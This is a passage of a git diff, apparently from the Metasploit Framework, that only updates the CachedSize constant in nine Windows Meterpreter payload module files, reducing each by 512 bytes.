index 9b1ac80418..0e6200bd6b 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 959043
+  CachedSize = 958531
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
index 91b073a44b..5445a70a8b 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 959043
+  CachedSize = 958531
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
index 8cdbd91f25..f90b20afd2 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 957999
+  CachedSize = 957487
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
index e2c6f3a72b..b7df1b5d26 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 957999
+  CachedSize = 957487
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
index 3633b8036f..493bfbf557 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 1189935
+  CachedSize = 1189423
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
index 329fd56d11..ee87c288fe 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 1190979
+  CachedSize = 1190467
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
index e65314a9dc..43d0262094 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 1190979
+  CachedSize = 1190467
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
index cb357b97cc..1ffc004cee 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 1189935
+  CachedSize = 1189423
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
index db6d7e57a1..01b46f82fc 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 1189935
+  CachedSize = 1189423
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows